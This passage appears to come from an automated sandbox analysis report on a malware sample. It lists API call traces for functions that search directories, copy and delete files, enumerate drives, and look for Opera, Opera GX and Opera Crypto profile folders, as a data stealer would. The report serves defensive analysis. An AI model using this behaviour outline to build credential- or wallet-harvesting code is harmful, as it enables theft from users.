                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00182336
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 001823A2
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 001823B6
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 001825DC
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018264F
                                                                                                                                                                          • Part of subcall function 00196ED9: Sleep.KERNEL32(000003E8,?,?), ref: 00196F40
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 001826C6
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 001826DA
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1475085387-1173974218
                                                                                                                                                                        • Opcode ID: dceaaee27b27e60a821e464a2656be3bcc57a4a391a4be84d68cf6ce73012461
                                                                                                                                                                        • Instruction ID: 9ba41316e8d99338b4e8d5efda3c57e324d62feace6e43f84f12b11b4d2888a3
                                                                                                                                                                        • Opcode Fuzzy Hash: dceaaee27b27e60a821e464a2656be3bcc57a4a391a4be84d68cf6ce73012461
                                                                                                                                                                        • Instruction Fuzzy Hash: FC3280319011299BDF22FB24DC46ACDB7B8AF25304F5241E1E558B7162DB70AF8A8F81
                                                                                                                                                                        Function 0019547D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfA.USER32 ref: 001954AA
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 001954C1
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6A88), ref: 001954E2
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6A8C), ref: 001954FC
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0019554D
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00195560
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195574
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195587
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6A90), ref: 00195599
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 001955AD
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00195663
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00195677
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                        • API String ID: 1150833511-4073750446
                                                                                                                                                                        • Opcode ID: 07dc9aeaad20651ce0251c6d5d2fd4e83a3390b811fcfc3b5f5e0647ee3c43b8
                                                                                                                                                                        • Instruction ID: 17e4d8543c78f71e41124d5fc38fdd3b65d96da76d61693ff0d8d28101fcfcea
                                                                                                                                                                        • Opcode Fuzzy Hash: 07dc9aeaad20651ce0251c6d5d2fd4e83a3390b811fcfc3b5f5e0647ee3c43b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D5130B594021C9BCF61EF74DC89AD9BBBCAB08300F4045E6E609E3250EB319B85CF65
                                                                                                                                                                        Function 0018BF22 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,001B682E,0018CC40,?,?), ref: 0018BF9A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7468), ref: 0018BFBA
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B746C), ref: 0018BFD4
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera,001B683B,001B683A,001B6837,001B6836,001B6833,001B6832,001B682F), ref: 0018C060
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0018C06E
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0018C07C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                        • API String ID: 2567437900-1710495004
                                                                                                                                                                        • Opcode ID: 69501c8571a41c148d1f26db5a36afe530db03e00b5fc0b2bb3d15fb934c3a72
                                                                                                                                                                        • Instruction ID: 5adeaa244263a3b3a9b2c3a2896c2bee3a665056b70edb613d787b1fcab5ee1d
                                                                                                                                                                        • Opcode Fuzzy Hash: 69501c8571a41c148d1f26db5a36afe530db03e00b5fc0b2bb3d15fb934c3a72
                                                                                                                                                                        • Instruction Fuzzy Hash: C602B331D001299BDF62FB24DD46ADDB7B4AF69304F4141E1E918B7162DB74AF8A8F80
                                                                                                                                                                        Function 00195182 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00195202
                                                                                                                                                                        • _memset.LIBCMT ref: 00195225
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 0019522E
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0019524E
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00195269
                                                                                                                                                                          • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194D5C
                                                                                                                                                                          • Part of subcall function 00194D08: FindFirstFileA.KERNEL32(?,?), ref: 00194D73
                                                                                                                                                                          • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194D8F
                                                                                                                                                                          • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194DA0
                                                                                                                                                                          • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B6A00), ref: 00194DC1
                                                                                                                                                                          • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B6A04), ref: 00194DDB
                                                                                                                                                                          • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194E02
                                                                                                                                                                          • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B660F), ref: 00194E16
                                                                                                                                                                          • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194E3F
                                                                                                                                                                          • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194E68
                                                                                                                                                                          • Part of subcall function 00194D08: lstrcatA.KERNEL32(?,?), ref: 00194E7D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0019528A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00195304
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                        • API String ID: 441469471-147700698
                                                                                                                                                                        • Opcode ID: 10c560117917cfbd4ee792b74dcad66e0a251e4b7e7ce20669f728359b0fab0a
                                                                                                                                                                        • Instruction ID: 88212482e61c38d6adeb350daf76865ac36e759293298fcb9c1376b129d362aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 10c560117917cfbd4ee792b74dcad66e0a251e4b7e7ce20669f728359b0fab0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 875119B190021CAFDF21AF64DC85AEEBBB9FB05304F0041A9FA09A7111EB315E49CF55
                                                                                                                                                                        Function 0018CD0C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfA.USER32 ref: 0018CD31
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0018CD48
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B74E4), ref: 0018CD69
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B74E8), ref: 0018CD83
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • lstrlenA.KERNEL32(0018D38A,001B685F,001B74EC,?,001B685E), ref: 0018CE16
                                                                                                                                                                        • DeleteFileA.KERNEL32(?,001B7504,001B686E,?,001B7500,001B74FC,001B74F8,001B74F4), ref: 0018D0F7
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018D10B
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018D211
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018D225
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
